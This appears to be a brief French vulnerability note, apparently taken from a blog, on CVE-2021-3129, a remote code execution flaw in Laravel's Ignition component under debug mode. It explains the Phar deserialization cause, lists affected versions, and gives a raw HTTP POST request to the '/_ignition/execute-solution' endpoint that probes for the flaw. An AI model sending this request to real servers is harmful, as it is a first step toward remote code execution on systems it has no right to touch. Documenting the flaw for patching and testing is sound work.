
Laravel RCE CVE-2021-3129
Laravel RCE CVE-2021-3129
Lorsque Laravel a activé le mode Debug, en raison de l'utilisation non sécurisée des fonctions file_get_contents() et file_put_contents() par le composant Ignition fourni avec Laravel, un attaquant peut déclencher une désérialisation Phar en envoyant des requêtes malveillantes, en construisant des fichiers Log malveillants, etc., entraînant finalement une exécution de code à distance.
Laravel <= 8.4.2
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution¶meters[variableName]=cve20213129¶meters[viewFile]=null

[CVE-2021-3129]Reproduction du RCE en mode Debug de Laravel | Blog de tyskill